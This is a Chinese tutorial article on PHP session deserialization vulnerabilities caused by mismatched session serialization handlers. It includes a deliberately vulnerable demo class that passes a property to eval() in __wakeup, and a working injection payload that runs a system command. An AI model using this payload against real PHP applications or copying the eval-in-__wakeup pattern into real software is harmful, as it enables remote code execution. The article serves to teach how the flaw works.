PHP session

php session 反序列化漏洞存在的原因：當(dāng)序列化session和讀取反序列化字符時(shí)采用的序列化選擇器不一樣時(shí)，處理的方法不一樣。

php三種序列化處理器

序列化處理器
php            (php默認(rèn)中使用的序列化)   存儲(chǔ)格式為：鍵名 + 豎線 + 經(jīng)過(guò)serialize()函數(shù)反序列化處理的值

php_binary   存儲(chǔ)格式：鍵名的長(zhǎng)度對(duì)應(yīng)的ASCII字符 + 鍵名 + 經(jīng)過(guò)serialize()函數(shù)反序列化處理的值

php_serialize 在php版本>5.5.4中可以選擇使用   存儲(chǔ)格式：經(jīng)過(guò)serialize()函數(shù)反序列處理的數(shù)組

通過(guò)php.ini 可以設(shè)置保存路徑配置 php session 參數(shù)是 session.save_path=“保存路徑”

php 中配置session序列化處理器通過(guò)ini_set()方法進(jìn)行選擇 ：ini_set(‘session.serialize_handler’, ‘處理器’);

生成session php_serialize序列化處理器

demo2.php
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();//創(chuàng)建一個(gè)session 會(huì)話（當(dāng)客戶端第一次訪問(wèn)時(shí)會(huì)生成一個(gè)隨機(jī)的session文件在指定保存目錄中）
$_SESSION['session'] = $_GET['k'];
var_dump($_SESSION);

訪問(wèn)該頁(yè)面

查看session 文件保存路徑，生成了一個(gè)sess_一串隨機(jī)字符的文件，打開(kāi)文件查看，從get提交的值以序列化的格式存儲(chǔ)到該文件。

在讀取session時(shí)使用不一樣的序列化處理器，使用php_serialize 序列化處理會(huì)把 符號(hào) “|“作為一個(gè)正常的字符處理。而php序列化處理器會(huì)把”|” 當(dāng)成分割符處理。

ctf.php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class test{
    public $name;
    function __wakeup(){
        eval($this->name);
    }
}

構(gòu)造成反序列化payload為：k=|O:4:“test”:1:{s:4:“name”;s:17:“system(‘dir’);”;}

訪問(wèn)demo2.php

查看sess文件內(nèi)容：| 分割符被傳遞了進(jìn)去

再訪問(wèn)ctf.php，觸發(fā)了__wakeup函數(shù)從而執(zhí)行了eval代碼執(zhí)行命令，由于使用不同的序列化處理器來(lái)處理session文件，序列化對(duì)特殊符號(hào)的處理方法不一樣，從而導(dǎo)致產(chǎn)生了漏洞

到此這篇關(guān)于PHP session反序列化漏洞深入探究的文章就介紹到這了,更多相關(guān)PHP session反序列化內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！